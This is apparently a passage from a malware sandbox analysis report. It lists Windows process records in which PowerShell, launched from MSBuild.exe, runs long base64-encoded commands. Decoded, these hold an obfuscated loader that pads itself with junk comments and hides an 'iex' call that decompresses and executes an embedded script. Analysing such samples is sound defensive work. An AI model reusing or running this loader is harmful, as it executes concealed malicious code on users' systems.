GEASAB0AFcAbgB4AHcAOgB6AFAAcgB8AFYAIwBtAC0AewBHAFEAQwBUAHYAWgBjAGwAZwAqAH0AcgBPAFQAKQBSAHkAWwAlADoAeQAtAEoAMQA1ACMAagBEAH0AfABlACoAKQAxAD8ARgBGAFMARQBzADkAdQBTACoAXQArADYAIQA1AFoAXwBEAC4AaABuAGQAZQAhADUAWAAwAHwAVgB2AFEALgBGAGYANgBiAEEAXQBhAEgAIwBzAGQANgBQAEMASwAlAHUARQA7AE4ARwB1AD8APAB5AGYASgAtAEwAVQBuAEMAWgBEACkAKQBKAF8ALABTAHsANgAgAG0AZwB9AGUAbQAyAEIASgA3AG0ARgAxAEQAaABBAEYAZAA1AGYAOgBkADMATAApACgALABQAD4APwB8AE4AZQB8ADIAbgApAHEAJgBDAHwAJQBlACsANQBCAHAAbwBXAGQATgBCADEAdgBRAC4AYgAuAFAAZgAwAF8ALgAwAHIATwBIACkAOwBOAGUAZwBSAGMAbgB0AFgAbwBHAFMAegB0AGkASgBJAC4AewB0ACkAcwAyAH0ARwBOAD8ASgBnAG4AWABSAFEAJAB3ACMAbwBSAHAARABWADMAQgAqAFoALABPAHsALgB2AGwASQA6AE4APQBaAF8AfAA6AFgANQBxAFIANQBRAD4ALgAzAFMAMgB9AFMAQgA1ACAAOABrAHwANQA7ACYAWgBIAE8ALQAjAE0AVQAmAE8ATQA8AHUAQQA6ACMAUQA/AE8AQwArACgAagBwAEYAdQA/AF8AcAByAFIAUwBmAHYAPwAjACQAKABeAHYAIwBuAEIADQAKACAAIAAgACAAIAAgACQAXwAuAFIAZQBhAEQAVABPAGUATgBkACgAKQAgAH0AKQA= | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | MSBuild.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Windows PowerShell Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 1180 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Console Window Host Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 1636 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | powershell.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Console Window Host Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 2168 | C:\Windows\Sysnative\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NonInteractive -OutputFormat Text -EncodedCommand "IwAgAGsAMAAjAGIAQQBoAFMAQgAwADIAYQBxAHgAbgBPAHsAaQAyACUAXwAzAGwALgBMAFcAUQBkAE8AUAB8AGYAXgBUADcAPwA3AEYAWQArACEAXgArAE8AYwA3AEwAIwBlAEYAUQA9ADoARAB7ADMAZwBrAHcAWABRAF8ANwBqAEwARgBhAHYAeQBWAFYAMwBFAGQAMABCAGwASgBKADwAKgBTACQAPABbAGwAVgA8AC4AKwAyAHAAdAAsADsAQwArAFAAcAB3AFIAWgBPAGUAUgAkAD4AawBKADMAagBxADIAVgBIADsASQBQAE0ALgBDAGwARwBaAC0AVwBHAEQAbABIAFcAdQB1AFMASAB3AE0AOwBoAEcAYgAkAHQAUABsADIAeAA7AEMARABFAHQARQBdACgAWgAxACMAbABCAFQASgA0ADsAagAjACUANAA2ACYAJQBIAGMALgBJADoAUQA1AHYAJgB4ADEAZQAyAE8AYwB6AH0AWQA9ACQAdQBIAHoAOwBoAFAAaABhADwAQABiAEcAYQAxADgAIwA0AHkAUwBjACkAewBTAG8AJABSACYAXgBGADcAKQBOAGwAawAmAGwASgAkACUALABMAFMAMABvADgAZgB0AHUASQBfAFgAQABZAE0AXwB3AF4AXQBwAHwARAA6AEQAcQBxAEcAZABzAEsAbABkAFAATwBtAFEATgBkADAAeAA3AC4AdwA7AGkAPQBNAHkAOwByAFsAcgBEAFEALQA1AE8AMQBLADAAewBeADsANQBsAGoAKQA6ACQAPQAtAGsAZABTAEMARgBlADoAZwBmAHkASgAxAD0AcwBdAGsAaAAyAH0AaQBAAHQAegBpAEcAZgB1AD4AOgBoADwAPwAhACwAbAB8AEMAbAB3AFAAKgA4AH0AYwBAADgAMABtAEcAdwAgACwAfABNACMAQQAjAEIATgBDAC0AMAAoADwAewArAFIAUQBAAHMAOAB6AA0ACgAgACAAIAAgACMAIABwAG8AbgAtAGcAagAhACUAaAB7AGsAeQAsAEQAYgA9AD0AbgAsAFoATQBSAF8ANABzAEwAcABkACsAZAA0AFIALAB1ACYATQBuAEQAZAA1AGQAPABYAHYAMgByAEEASwA1AGUAOgBUAEwAagBRACwAOABMAEQAfQBBAC0AJABRAD0ANgBTADAALABiAGIAdABvAFUAVAB1ADkAYQAuAGMAWQBJAHsAdABBAEAARAA4AFQARQAgADsARAArAD0AfQBYAGoAdwBUAEUAWwBFAEQARAAoAEkAYgAhAD8AWAA6AEoAXwBQAEoAXQApAE4ARgBzAHkAcgA7ACwAcQBaACUAbAA0AHoALgBIAG4AdwBhAFgASAB9AGwAQQBwAFYAUAAqAFEAegBnAD8AQQAjAH0ANgBbACAAYgBiAHkATgBtAGcAOABhAFMAJgBuACsAPwBfAFoATgB2AEMAYQB9AC4ASQBMAHUASABKAFAAQAB4AFUAOABUACAASAB3AEYAYQAsAEYAbgAkACYASQBDADUAbwBEADoANAB8AGkAIABIACYAdwBLAGwAUwB2ACsAPgBqAGoARABeACYAXQByAGEAWgAsAHUAOgAuAFMARQAwAFMADQAKACAAIAAgACAAIAAgACMAIABuAFcALABTAEcAdgBxAFYAXwBfAEkAUQBoAF0AfQBDAEYAXwAuACUAKQBFAFQAbAB1AC0ANwBbACkAUAAoAGcAWwBmAHAAYgBZACsAUQBbAEYAawA7AE0AVQBeAGcAbAApAE0AUgB3AHkAZwA8AGwAUQA0AEEAOgBoAGQAVAAuADQASQAlAH0AYwAyADkAJQBKAFkAYgBDACsAOwBGAFQAOABbAD4ASAB0AHQAPwB4AEYANwB0AEMAagBKADUAZgApAGsANABjAGUAOgBNAFoATgBeAGgASgBRAGEAYwBrAGQAIwBoADkAPQAmACQAKAAoAF8AWQAoAGMAcQA5AEAAQwAwACMAbgBzAGMAZAB8ACAAPABtAHwAQwAxAH0AVQBAADcAXwBsACEAIQBPAHgAZAA+AHMAUwBxAFYAVgAsAEUAQgAsAEAAOwA/AGQAPQAlAGMAQgAhADIANQArAFsAXwB4AF0AaABWAD8AVwBxADcAZwBMAC0AUQBXAGwAIQBYACEAeAA6AGkAMQAlAHsAfQBDACwANQAlAEMAaQBkAE0ALgBeACwAMgB5AGUAWgAyAFAANwAlAE8AdgAsAFkAbQA+AGcAegB0AEEATQBjAFgAZgBhAGMAeABNAEMALQBnAG0AOwAuAEMAdgB2ACEAYgBHAFQAeABFAHYAdAA4AGgAYQB7AFUASQBpAHgASwAmAEgAagAsAEEAMAB2AG0AOABIACoAbAAmAEsAPwAlACQAdQBDAFoAXwBZAGUAdQAlAEMAMABwAHYAdABnAG0AWgBoACwANQApADcAKAB6AGoARgA1AG0AZgBEAHEAcQAxAGQALQBCAH0AegAxAGoAagBvADgAWgBuAEUAZgBdAG4AUABFADcAXgBNAGYAdQBvAFYAPQBlAFIAdwBrAFgATwB5AFcAdABrAF0AawBTADAAWAA/AEQAbQAtADQARgBFAEgAKgApAG4ATABUAFQAbQBbAFgAYwB8AC4AYgBOADkAdgBPAGQAfABWACwASgBvADYAdgBrAEkAbQBXAFUAOwBkAGwAdQAxAGwAWAAzAEMAdAB1ADwAJQBwAFoANABZAGwAaABUAEQAbgBGAEIAbAArADsARQBvAFAAeQAmAEkAYwByAEwAfQB1ADsAOQBuAFIAOwB9AC4AdgB1AEAAUgA/ADoAVgBiAF0AVABbACgAWwBpAGcAbABIAEwAbgAmACMAJQBfAEsAIAB7AHwARwAmAFkASQBpADwAfQBVAD8AQwA9AD4AIQA9AEMARgBxAGMAUQAuAC0AOABqAF4AegAjAEAATwBuAG4AMwBOADUAKQArADgAdABXAHUAfQBFAG0AewAwAGwAdAAkAEEAZQBmAC0AKQAwAEwATgA0ADYAPQBlACAAWQA8AHsAVQApAGUAaAApAGEARAByAEIAMgBZAC4AKQAzACMALQBfACYAKAA7AGMARABiAGYAIwBHAHcAUQBfADQASQAqAD8ARQBAAEwALgBNAEcAPgBkAGEAeQBXAE0AZgBFAGgAKABDACEALQB5AFAAQABGADQAPABSAEIAQABEAE8ANgBzAHYAJgAxAEcANAAyAFgAXwBJAF8AKgAyADIAawBtADwAIAB0AGcAKgBzAE0ASAB8AFkAKgB7AEkAeQBfAE4AawB5AHwAdQBEAGsAMQBGADsAdwA8AC0AaAAkADcAZwB2ADsAPwBGAE0AcgBxAGYAQwAwACQAaABXAG4AUgApACAASQAhADoAeAAmAHcAZQAoAC4AKAAjAEcARABNAGgAagB7AF4AVgAyAHQAeABUADoAcwA6ACgASQB3AG4ATgBNACgAawB7AGQAWQBSADEAPwAkAFcAZQB8AHcAIAApACEADQAKACAAIAAgACAAJABhACAAIAAgACAAPQAgACAAIAAgACAAIAAgADEAMAAxADAANAA7ACQAYgAgACAAIAAgACAAIAAgACAAPQAgACAAIAAgACAAIAAgACcAQwA6AFwAVQBzAGUAcgBzAFwAYQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXAB0AG0AcAAyADYAOABGAC4AdABtAHAAJwA7ACYAKAAgACAAIAAkAHMAaABFAGwAbABpAGQAWwAxAF0AKwAkAFMASABFAEwAbABJAEQAWwAxADMAXQArACcAeAAnACkAKAAgAG4ARQB3AC0AbwBCAGoARQBDAFQAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIABzAHkAcwB0AEUAbQAuAEkAbwAuAEMAbwBtAFAAUgBFAFMAcwBJAE8AbgAuAEQARQBmAGwAYQBUAGUAcwBUAFIARQBhAE0AKABbAGkATwAuAG0AZQBNAE8AUgB5AHMAdABSAEUAYQBNAF0AWwBjAE8AbgB2AEUAcgB0AF0AOgA6AGYAcgBvAE0AQgBBAFMARQA2ADQAcwB0AHIAaQBuAEcAKAAnAHAAVgBUAFIAYgB0AG8AdwBGAEgAMgB2AHgARAA5ADQAaQBJAGQARQBNAHMAaQBqAGEASgBxAEsASQBwAFcARwBkAHEAdgBVAGEAaABWADAAVwB6AFgARQBnADAAbAB1AFMAVABUAEgAagBoAHkAbgBEAFMAdgA3ADkAOQAwAGsAWgBvAFUAdQBHADAAVgA3AGkAZQArAE4ANwBYAFAAdQA5AFQAbgAyAEsAQQB5ADcAdAA2AHMAVQBTAFAAVQBkAHcAMwAwAHMAWQB4AE0AcgBTAFUANwBiAHIAYQBNADgAaQArAFcAUwBUAEYAZQBaAGcAVwBSAEkAdAByAFAAZQBKAEoAYwBtAFQAcQBCADMASwBRADEAbwBsAFUANQBCAFAAOABRAEIAWgBNAFAAVwBVAFoAbwB2AFIAQgB5AFEAUQBQAEEAcwBJADMAZABQAEoARgBBAHkATQB5AFMAUABwAFMARQBqAGoAeABXAE0AcwBUADQAOQBLADQATQBCAFkAOQBTAHYALwA3AHkAbgA0AHkAcgBvAE0AMwBwAGUAQgBXADgAWgBJAHMAMwBHAFEAbAB3AG0AcQBkAEwARwBhAFgAOABIAEwAVQBFAGMAOQA5AHYAdQBQAEQAUABjAEkAQQBFAFUAeQBDAHcASgBGAG4AQgBqAE4AUABtAFUAZwByAHoAUgBDAGsAdgBJAG4ASQBxAHIAbwBBAHUAbABCAEYAbgBSAEsAdgB2AGgAdgBoAGEAdgAyAHUAVQBMAGwAYwBGAEgATABrAE0AQgBqAGkAVQBvAFgAbwAxAGcATgAzAHkASgB0AGMAbQA1AEcAQQBtAGgAZwB2AFAAaQBOAHcAeQAxAHcAYQBhAHcAZQB1AEQAMQBzAEQAaQBzAHoASwA4ADYATgBtAEMANwB2AG8AWgBFADYAVgBVAEQAegBXAEoAbABZAEQAWgAvAEoAbABLADUAVgBlAE4AQQBNAHQAcwBQADAAaABrAEkAVABHAE4ASABuADIAMwAwADMAMQB3AFgASQBzACsAaQBTAC8AUwBOAHoAbwBQAFMAagBUADQAUABJAHYAZwBYADQAYQBIAGkAKwBCAHEANABnAFEAbQBlAG0AWQBIAGIAQwBKAFAAdwA3AHcATABaAG4ARwArAEMAUgBUADAAUgBiAFAATABRAGYAWABhADkASgBhAHUAYQBtAE4AUgBHAFQARABjAEsAaABPADYAVAAzAFIARgA1ADIAMwBZAGQAcgBjAC8AVwAvAG4AcQA4AFAAcQBmADMAWABHAFIAQQAwAHgASQB2AHYAbgBjAGkAegA2AHYAWAA5ADcANwBoAEYAWABNADEAbQBCAHcAYgBxAE4AWQBNAEwAVgBEAGkAdgBYAEIAWgBSAEwAZQAyADAASwBvAEEATgArAHgAZABnAFYAeQBhAGkATABMAGkARwBPAC8AYQBtAGgAVgA5AEgARABBAGIATQBNAHUAVQA3AEQASQA5AGIAZABzAC8AYwBvAGMANwB6AEQAKwByAHAAdABTAFEANABMADQAMwBmADMAZwBpAG8AZwBsADEAcgBDAHIAYgB4AEEATgBXAGUAVQBHADUAZQA4AEQAeAB6AFMAbgBoAEgANABjAGwAZQBvAE8AOQBTAC8AegB3AFoAVgA4AGwAOAB1AE4AKwA1AEIASwB5ADIAVgBpAE4AVgBlADgASAB0AEMASQBZAHIAOABGAE4AdQAwAEkAdwBKAE4AagBOAHQAOAArADcARgBzAEUAYwBJAGsATAB6AEoASABhAEYAYwAxAGgAWgArADUAUgAwAHIANwBoAGMANQBuAHcASgB4AEoAOQBHAFgASwBlAHQAbwAwADcAbwB6AFgAdwBsAEgAMABDAGIAKwBjAG4ASgBoAFYAYgBKAEcAYwAvAGcAMwBXAEIAcQBOAEQANwBzAGoAdgBNAEIAVABCAGYAbgBEAGEAQQBBADMAUQBsAC8ASgBKADIARgA2ACsASwAxAHUAcwBQAFYARQAyAGQAVwBuAHYAbAB4AGYAOQA3AGgAdABCAFAAaQA3ADEAOAA9ACcAKQAsAFsAcwB5AFMAVABlAE0ALgBJAG8ALgBDAE8AbQBQAHIAZQBTAHMAaQBPAE4ALgBjAE8AbQBwAHIAZQBTAFMAaQBPAG4ATQBvAGQAZQBdADoAOgBkAEUAQwBvAG0AcAByAGUAUwBTACAAKQB8ACAAIAAgACAAIAAgACAAIAAlACAAewANAAoAIAAgACAAIAAgACAAIwAgAEEANABOAFEAfABaAHUAVQA5AGEAdQBfAD8AYgB8ACgAJgBbACoASQB4AHQAPAA5ACQAXwBKAGcAMQA6AF8AOwAlADgAXwA9AEEAOgA9AFUAUwA1AGkAdwBaACYAIwAmAHIARgB8AEAANQA3ACAAQwApACgARQBFAFkAagBnADEAXQA0AE0AcQByACkAQABvACwAcgBJAHgATABnAEwAOQAyAFIAdwAtAEAAYgBWAFQALAA3ADgAXgA2ADsAMwBxAFIAOwA7ADAAXgB0ADsAKwB6AGIAMABJADgATgBeACQAaQBnAGcATgA6ADIAbgAhACQAcgBNAHYAagA4AGYAbgBPAHEAWQBmAF8APABBAEkALgBSAE4AfAA+AEkAMwBeAEUAdwBSAHwARQBNAHMAdQA4AFkAPAApADgAfAA9ACkARQBCAEAANwBPACEAUwBZAHIAegBjAH0AOABxAFYAOABNADsANwA0ADkAbABGACoANABWADQAdgApACQARgB3AGsAXQBaAFsANQBPAFcAVQB3ADQAXwB6AFsAbQBMAD4AQgBKAEIAbgA/ACsAJAA8AGkASgBdADcANAAjAHMAJgAxADwAdgB6ACYAPABuAGsAcgAyAEAATAA2AEMATQBoAEkANQB2ACMAVABCAHoAdwA4ACQARAB2AFQAdABwAGoAagBrADQAVgBMAHgAJgB5AGQAKgBHAE4ANQBsAGoAOwBlAGEASwB3AFAARgBYAFYAdABMAFgAZQBCADkASQBfAG4ATQBKAC4ASABoAC0AZwA1ADoAfAA0AEoAeAA3AGkAVABTADoAVQBhACsAKgA6ACAAawBIAF8AXgAxAHEAVAA7ACMAdQB9ADIAVQAkAD8APwA9AFQAWgBdAHcAJAAoADUAVABBAGgARgA6ADkASAA+ADIAfQBdAFUARwBCAHMAMgBOAD4ALAB2AEAAcgAqAEwAMwBaAGsAcABIAHQAcAANAAoAIAAgACMAIABqAEEAYQBZAGIATgBHAFUAQgA+ACEARQA6AGwANABfAEUARwAzAHMAUgBiAEcAbABdAFUAQwA6AG0AcAArAC0AcQA7ACQAWgBAADcAUwBFACMAWABIAFUANQBhAD4ASwBQADUARgBbAGoAcAB9ADUALAAhACkAUABBACAAdAB3ADwAcgB5ADYAQAA0AE8AcQBwAD8AUQA5AGEAUwBwAC0AYwA4AEkAVgApADcAawBbAGoASQB9AF0ATgBYAD8APAAkAHEANQBtADkAOwBZADAAcgA/ADQAQQBYAEcALABWAFYAcgAzAGoAJgBBACMAWABvAD8AKwBFAHAAZAArADIAKQAtADMAYQBoAFAAUAB5ACAAIwBjAEgARgBWAGUAVABaAHwAJgBJADMAUwAlACMAPgBdAFYAdwBuAGYAZQAlACMAXQBuAGcAQwBBAFkAPQBSAEEAZABbAH0AYQAkAEQAPAA1ACwARgBvAD8AXQBrAEkAPQBWAGIARQBmADMAUQBGAF8AaQBbAGoAawBfAEsANQBqAFUASAA0AGwAeAB3AGgAXwAxAF8AcwA0AEkAawBBAE4APgBAAFoAZQA9AFgAcAA5AEIAJABbAEYAXgBUAGoAZgBKADIAegAzAEQAPABVACAAbQBBACEAMgBoAHQAVwBjAFIASwBNAGUAOgBpADkATQBxAEAAUgBqAHcAXgBzAGYALgBvAFgAZwBpAGEAZgBbACUAUAA2AD0ARQBQAEkAXQBdAG0AMQBIAHYAVwBoAGcAVQBrACkAOQA2ADIAaQBIAHcAagBpAGwAQgBBAEoAMABeADcANQBlAHUAPgBfACQAIQBMAHQANgB3AEoALAApAFEAawA+AFYAIwB2AD4AbgA8AHUAVgA1AEkAWAA9AEEAPgBmAEEAbwAtADgAUQBfAGwAcQA6AHoAVQBDAGIASwBTAGUAcQAyACAAVAB2ADIASwBoAG4ASABvAHgAawAzADQAPgBJACgAMgA8AF8ASAA4AEIATQA7AGMAdQBjACwAIwBBAE4AXwAtAEYAXQAhAC4AcQBAADYAfABQAEsAXwBKAE0ARABBAFsAUABSAEMAWQBhACQAMABiAFIARQBwAH0AMQBfADgARwAzACEAOQA5ADAAUgBqAHsAOABCADoAXQB7AH0AcQAqAD4ARgBGACkAWABYAGkASwAjAD0AYgBHACQAOQA6AGoAJAA9AGIAYQBbAE8AawB4AE0AKgA9AFsAZAA9ADAAPgB0AE8ATwBRAFAAVQAoAG8ATABOAEoAWQBUAG8AZQAuAHsAKwB9ACsAPwBXADcAWgB6AEAAeABeAHkATAAwAHgANAAkADgANAB5AFAAMABRAEUANABDACkAeQBQAHAANQAkAHkANAAhAGMASgBJACEAcQBKAHAATgArAHAAUwB4AFcAdQAyADoALgBwACwAPgByAHIAWgB7ADwAKQBpADMAVAA/AFUARwBuADsAZwB1ACYAOgBfAFMAZgBoADgAXgBlAHUARQBzAG4AVwBBACkAagBDADsAJgBoACUAbQBTADwAPgBAAHcAOABzAHIAIwA9ACEAVwBJADYAWwAhAHsAJQB6AHMAUwBBAFIAMgBsAFUAbQBWAHcAaABqADQAZgAzADoARgBaAEAAOABwAD0AIwB6ACoAfQBBACkANQAqAEAAPwBLAFIAbwB7ACQAdgBqAD4ASABuAGsAfQBTACgAbQB9AF8AcwA1AFgAWwA7AD8AaABHAFMAPAAuAFkAdAAsADkAbgBKAHwANgBSAEYAcAB6AFgAaQBeADkAdwA3AFkAOABYAF4AOAAoAGkAPQBUAEMAMgBuAHgARwBKAHwAWABSAEoAIQAuAFMAbABrAGkAIAB9AD4AagB7AHEAVAA7AG8AMABlACAAagAuAHkAPAAsAHsAZgB5AGUAKwBQAD8AeABrADoAQQBdAGIARABRAFMAbwA7AGgAXgArAFoATABZAE0AfQBWADkAOQB9AEQARQBUAG8AUgBLAHcAbwBCAEQAUwBvAD4AQQBIAD4AIQBtADoANABaAFoANABSAEQAXQBSACUAeQBeAHQAQABbADEAWgByAEsAcwAxACEAPwA6ADwAMQBKAFoAdABaADcAUQB2AEQAQQAuAF0AUQBeADAAdQBJAD8APABHAEIAWQB2ADAAJAA/ADwANAAwAF8AeABSAHAAawA5AHIASAB2ADoAOAA4AGoAZgBUAG0AVAB0ACoAawBVADkAKABrAD8ATwAqAEQAdwBNAFcAOQA5AFoAdgA4ACEAVgB5ACUAOgAzAEcAZwAkAF4AegAjAGgADQAKACAAIAAgACAAIAAjACAAKABOADoAPABsAHkAWwB2ACgAcQBzACoALAAxAFYAcQBNAF4AIABYAGsASAAzAE8AMQB5AG0AQQAyAEYAYQAtAEMANgAuACQAQgBFAC0AVgBTAHoAZwAzADgAfQBkAHIAdABQAHkAOgA9ACMAPABdAEIAZgBDAHEAOQBuAHIASgBRADEAQgAyAGYAWABZAF4ARQBmAGYAIAA2AEkANAAmAF8ARgBZAG0AMwBIADgARAA2AHYAVwBHAEcAcgBnAG8AMAB5AFMAeQAyAGoAeQBRAC4AVwA5AC0AfQBzAD8AbQBGAHsAUQBxAH0AQwBMAHQAPwA3ACwAWwB4ADwARABPAEoAZgBZAEAAfABoAFYAQgBWAHUAVABMAHAAQgA+AE8ALQBHADAAJQBfAHQAMQA1AEEAJgBPADAAOgBbADcAawBCAGIARgA4AGcAeABhAFgAQABKAGQAIQAjAEsAMQBnAEEAOQBhADsAOgBrAGEAagA3AEwASgBNAHkAPQBkAGsAWABwAFUAfQA6AHEAOABkADwAYwBRAA0ACgAgACAAIAAgACAAIAAgACMAIABoAFEARgBjAFUAPwB1ADMANQBLACoAPgBiAGwAaQBOAFIAOgBMAFQAMwAyAFAAYgAqAHsATwAlAD4ARwBfAGkAPgBkAHgAeQAgAGoAVgBMAGMAPQBxACEAWAAuAFsAMwA4AGQAWwBPAG8AQgBAAE4ASQBVAEYAIABlADgAVAA9AGMAUgA6AF0AZABHAF8AIQA6AGYAewBwAFUAZwBrAEsAYgBWACAATQBwAGEAJAA6AGIAKgBYAD8ASgBJADIASwBoAEwAVQA/AFoAIwBEAHsAMwAlAG4AegB8AFsAXgApAHEAOgArAG4ALgApACsATAA2AEIAXQAgAEwAVQB5AG0AbAA1AFEANQAwAGEAMwB3AGMAXgBzAHIAewApACoAXgBqAFMALQBdADcAKgBYAC0AeQAqACAAeQBeADYAcAAoAHUALAA3AE0AaABJAGgAUwA7ADUAMwAjAHcALQBtAE8AQABqAD0AQgBDADsAVQBQAHsAWgAjAHcAMgBRAGsAZwBrAFMAQQA8AE0AUAA9AEcASQBGAEIANwBlADAAXgAlAHEAMwBJAHQAagA0AHsAKAAwAGUAPwBOAHMAawBqAHgAawAwACQAZgBmADYAcAAyAG8AcgAsADYAXgArACQAMwBkACQAVgA6AD0AWABOAHQAbAA4AGMATgB8AG4ARQBIAD4AZQAwADQAewBCAEcARABUAEUAawBAAD0AUABtAGoAaQAjACEAKABEADkASABbAHAAcwBYAHgAMAA2AFkAXgBdAFIAfQBvAEwAPwBPAEYAdwBaAEsAWQBbAHsARQAhAG8AcQBCADkAVAA5ADUAewA0ACMAOQAxADMAeAAgADYAawAqAHcAKQAsAEQAWgBBAF4AVwBzAD0AbwB0AHUAJABzAHgAQgBMAGcALABIACoAaQBuACgAMwB2ACoAYQBFAFUAYgBIAGEAWAA9AHMATABsADUASAB9ACwAaABtACgAVQAwACwAQABBAFoAbAB3AFQAcwA2AFUAIQBhAHIAIAAwADgAdQBkAD8ARgB7ADcAUQBuAFYAegBHADcATQAmAG0AVQA9AHUASAA3AD0AIABiADMALgAoAEAAPgAxAFgATwBHACgAIQBHAEUARABeAEUALQBeAHoAYgA1AHcAKQBSAGcAMwAmAEgAQgB4AD4AOgBnACUALAApAGIAcgBnAFgASgBOAHwAOABqAHYANABQADwAOwA3AD0AOQBEAEsAIwBIAHMARABWAHEAYgAlAF8ASgBYACwAWwBoADQAWgBnADQAJAB5AEAAbQBPAHUAVgBYAC4AeAB5AHsAUAA/AGcAUABKAHsAXQBDAHgAQQBQAD0AUQBoAEYAJAAqACwATgBkAHwAJABqAF0AZQBZAFcAYQAgAFcASAA/AGsAVgBRAHkAfQA8AHIAdgBdAFEALQBUADYAJgBUAFkAZQBAAHMAUgA+AE0ALQBAADwAIwAtAEsAOgA1AEwASwAkAF4APgBJAHoAfABRAFgAcwA7AHwAbABbAHQAUwBoAGgAOQBbAHgAVgBOAEQAUQBrAGcAXwBaAGwAQgBIAGQAawB1AHgATwBhAHwAJABNAF0ATQBaAEcATABBAFIAMABAAFIAWgBOAF0APwBYAE8ASwB3ACQASgBfAE0APAB0AGoAVwBxAFAAKABPAFAAZQBuAE0AdQBZAEEALQBNADwAQgBXAFMASQAgAEUAPgB9AF8AfABAACsATQB6AE0AcAApAFIAOgBWAGgATQBqACwAMwB7AGIAegA4ACEAZgBQAC4AQQBeAHQASwAlACsAWQAoAFMATwBCACQAWAB7AFUANwBsACUAMQBvAGkAIwBSAHYAKQAkAG0AZwAkAGMAIQBfACQAZgAzADsAWwByADcANABbACMAKABbAHIAPQBnAE0APgBAACUARgBBAGQAWwBfADcAcgA+AHcALQBfACoAbwB9AGMAagBRAHMAZwBfAD4AcwBTAG0ATgB7AFgANABDAGQALAB9AD4ATAA/AEQAZQA9AEcAZQBAAGcAWABlADQANgA+AD8AawApAFIATQBSAH0AJABPAFIAQQBGADUATQBnAE4AaABBACEALgBFAEIAUwByAGsAZAB1AFIATwBDACoAJAB5AEYASABxAE4AVgA9AGwAQQB4ADQAeQBfACUAQABZACQAeQA/AEwAeABqAFcAJQB4AHAAWgBoAHgASgBsAEYATABJACUAbABhADcANABdACgAdwB7AGUAawBNAHUANABOADIASQBRAG0AKgBaADQAVABJADIAKwB2AEgARwBJAHsARgAgAEsAWQBaAFMAMgB3AGgAUQAhAHYAWwBiAHsAeABAACsAJABkAG0APAA3ADgAMwAoAF0APwAgAHgAbwB6AEcAcgBQAHEASwBOAD0AaQBNAFAAMwAuAEkAOwBhAHMAPwBiAEQALABZAGkAZgAmADoAQABQAEcAVwAmAGkAUABpACMAegBaAEYATQBYACYAcgAzADsAQgBoADEAIwBuAEkAWgA/AHUAOQBtADMALABvAHkAQAA7AHcAaQBaAEQASgBjAFIAbgBEAEwATwBEADsAMQB1AEAAJgA7ACUATwA6AEkAegAwAFYATwA8AGcAcgBYADEAOAA+AF4ATQBLAA0ACgAgACAAIABuAEUAdwAtAG8AQgBqAEUAQwBUACAAIAAgACAAIABJAE8ALgBzAHQAUgBlAGEAbQByAGUAYQBkAEUAUgAoACAAIAAgACAAJABfACwAWwBTAFkAUwBUAGUAbQAuAFQAZQB4AHQALgBlAG4AYwBvAEQAaQBOAEcAXQA6ADoAQQBzAGMAaQBJACkAfQANAAoAIAAgACAAIAAgACMAIABMADgAKwBHAHAAfABJAFYAUwA9AEMAMwA5AEQAWQBSAFEAUgBCAEIAcQBlACoAUgA6AG4AZAA+AGIAVgAjACMANgA9ADAAKQBWAF8AOwBKAEMAcwApAEEANABeAHYARAAzADsAJQBHAHMAbwAjAEkAZgAtAEgAZABXAEoAWQA9AFkAWABjAHMAUABWAHkAKQBhAEwAfABjADkAeAB3AFQANABdAGYAJAA/AD8AZgBDAHMAfABiAHMAfQBFAGgAagAkAF4ATwB3AGUANgBVACoAMQApAFsAPABYAE4ANAB8AGQAPwBrACkAYgA9AHkAKABVAHsAZwA7ACoAcgBRACsAbgBdAEYAPQBrAFsAOwArAF8AWQBhAFEARQA1AGoAKgBPAEgAZgBMAGoANgAwAFYANgBkADUAbQAhAG8AdQBOAFUAMQBLAFMAcABTACkAPABnACQAawB9AC4AJgBAAG0AKABOAEEAYgBrAG8AeAAzACEAQQBtAFMANQBWADwAQABbAD0AbgA9ACMARABAAG8ASwBMAHAAOABdACAALQBKAGQAbAA1AEwAegBlAHIAXwBWADwARwA5ACUAPwB6AGoAPAB3AHcALgBiAFkAVABvAGYAdQBTAFQANgBpAHoAMgA4AGIARgBEADQAZgBrAH0AaQB2AFEAfQB8AGkAZABnADMASwAsACoATAB7AEwAJgA5AHIAXgBoAEwAaAAyADcALgBPAE0AKABBACUATwAlADEAWwBMAGQAKgA2AFYAKgA4AHsAVABLADwAWgBPACYAMwBhAGMAXgBQAGcAVgB2AHMAeQA3AG4AOABeACUAZgAyAG8AYwBaAF0AZgA9ADkAfAAzAHQAOQBPAG0AIQBqAGoAZwB0AFUAQAAjAGIAOAB2AE8ALQA+AEEAIQBTAEoAVgAzAFsAdAA2ACoAdgAzAEUAfQBrAEMAawA7ACUAcQBzACAAXgBOAGwAIQBNAFMANABxAFIATQBNAHQAZQBpAGEAKgAzAD0AWABxAHYAJAB6ADQAOABMAD8AfQBFADwAUQBNAEQANQAmAEcAJQBHAEoASAA7ADUAdABMAFsAPwBvADMAZQBfACoAMABMAHIAPwB0ACMANgBwAH0ANAA9AEMAUQA4AFQAawAhAF8AUwBLAHIATgB3ACMAUABLAHYAUgAkACoAXwBRAHcAJQA3AEYAQwAqAE4ASwBAADwARgAkAG8AcgBvAFgATQBVAHYAawBxAGcAbQB6ACYAIAB2ACsAcQBzACwAYgBZADkAdABWAEcAPwBVAHkANQAwAEwASgA1AHsATgBGACMAdQBIAE4AYQApAHEAfABWAEkAagBAAGUAKQApAEkAcAA3ACgAWgBaAEsAQgAwAFEAYQAwAFUAYQBPADwAPQA8ACAAdwA5AHkAMQAxAEkAJgB5ACYAZgA5AHcAIwBnAHMAIwAoAGUAKgBbAGcASwAyAEEAeQA1AE0AQgB4AH0AKABEACUAKQB6AGUAaQBOADsAQQBnAGsAYQAlAHEAKABkAFAAeQBpAHkAIwBvA